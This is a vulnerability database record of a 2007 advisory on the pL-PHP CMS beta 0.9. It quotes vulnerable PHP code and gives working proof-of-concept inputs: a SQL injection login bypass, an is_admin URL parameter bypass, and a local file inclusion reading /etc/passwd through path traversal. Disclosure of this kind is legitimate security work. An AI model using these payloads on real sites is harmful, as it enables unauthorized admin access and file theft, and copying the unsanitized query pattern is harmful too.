{"id": "SECURITYVULNS:DOC:16657", "bulletinFamily": "software", "title": "pL-PHP beta 0.9 - Multiple Vulnerabilities", "description": " . . . \r\n._ | _. .|_ _. _.;_/\r\n[_)|(_]\_|[ )(_](_.| \.net\r\n| ._| \r\n"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"\r\n by Omni\r\n\r\n1) Infos\r\n---------\r\nDate : 2007-04-10\r\nProduct : pL-PHP\r\nVersion : beta 0.9 - Prior version maybe also be affected\r\nVendor : http://sourceforge.net/projects/pl-php/ - http://www.karlcore.com/programming/blog/\r\nVendor Status : 2007-04-10 -> Not Informed!\r\n\r\nDescription : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system, with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics and sub-topics. It will be very easy to use.\r\n\r\nSource : omnipresent - omni\r\nE-mail : omnipresent[at]email[dot]it - omni[at]playhack[dot]net\r\nTeam : Playhack.net Security\r\n\r\n2) Security Issues\r\n-------------------\r\n--- [ SQL Injection - Admin Access Bypass ] ---\r\n===============================================\r\n\r\n[login.php Source Code Bugged - Line 10 - 20]\r\n\r\nrequire("includes/config.php");\r\n\r\n// Authentification\r\n// Script inspir\u0439 par DBprotect 1.0 de David Borrat (david@borrat.net)\r\nif (isset($_POST['login'])) {\r\n $login = $_POST['login'];\r\n $pass = md5($_POST['pass']);\r\n \r\n$sql = mysql_connect($global['sql_host'], $global['sql_user'], $global['sql_pass']);\r\nmysql_select_db($global['sql_base'], $sql);\r\n$verif_query = sprintf("SELECT * FROM " . $global['prefix'] . "_users WHERE username='$login' AND user_password='$pass'");\r\n\r\n[end login.php Source Code]\r\n\r\nAs we can see the variables $login and $pass are not properly sanitized before being used; so is possibile to exploit this vulnerability remotely.\r\n\r\n[ PoC ]\r\n=======\r\n\r\nJust run with your browser to login.php and insert in the login field: 1' OR '1' = '1' # and in the pass filed what you want! Now you have Admin credential!\r\n\r\n--- [Global Variable problem - Admin Access Bypass ] ---\r\n========================================================\r\n\r\n[admin.php Source Code Bugged - Line 14]\r\n\r\n[...]\r\n\r\nif($is_admin == 1)\r\n\r\n[...]\r\n\r\n[end admin.php Source Code]\r\n\r\nAs we can se, via the browser we can just connect to admin.php script and pass the variable isadmin the number 1 :D.\r\n\r\n[ PoC ]\r\n=======\r\n\r\nhttp://remote_host/[remote_path]/admin.php?is_admin=1\r\n\r\nNow you are Admin ;)\r\n\r\n--- [Local File Inclusion ] ---\r\n===============================\r\n\r\n[admin.php Source Code Bugged - Line 16]\r\n\r\n[...]\r\n\r\ninclude("admin/lang/" . $lang . ".inc.php");\r\n\r\n[...]\r\n\r\n[end admin.php Source Code]\r\n\r\nAs we can se, via the browser we can just connect to admin.php script and pass the variable $lang a pretty good path ;).\r\n\r\n[ PoC ]\r\n=======\r\n\r\nConnect with Admin Credential and... Have fun..\r\n\r\neg 1:\r\n\r\nhttp://127.0.0.1/files/admin.php?is_admin=1&lang=../../../../../../etc/passwd%00\r\n\r\neg 2:\r\n\r\nFirst you must.. log in as Admin (SQL Injection Method) and then...\r\n\r\nhttp://127.0.0.1/files/admin.php?&lang=../../../../../../etc/passwd%00\r\n\r\n3) Patches\r\n-----------\r\n\r\nEdit the source code to ensure that the input will be properly sanitized before being used\r\n\r\n\r\n\r\n", "published": "2007-04-11T00:00:00", "modified": "2007-04-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16657", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 1.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7564"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645578531}}

{}